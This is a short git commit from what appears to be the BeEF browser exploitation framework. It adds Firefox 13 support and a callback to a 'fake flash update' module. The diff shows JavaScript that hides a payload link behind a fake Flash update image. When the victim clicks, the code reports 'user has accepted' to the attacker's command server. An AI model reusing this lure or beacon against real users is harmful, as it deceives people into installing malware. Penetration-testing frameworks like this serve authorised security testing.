Added support for Firefox 13

Added return message for fake flash update module
This commit is contained in:
bcoles
2012-05-29 16:40:15 +09:30
parent 874bc14278
commit 75315f8622
2 changed files with 14 additions and 3 deletions

View File

@@ -28,5 +28,6 @@ beef.execute(function() {
div.innerHTML= '<a href=\'' + payload + '\' ><img src=\''+ image +'\' /></a>';
$j("#splash").click(function () {
$j(this).hide();
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer=user has accepted');
});
});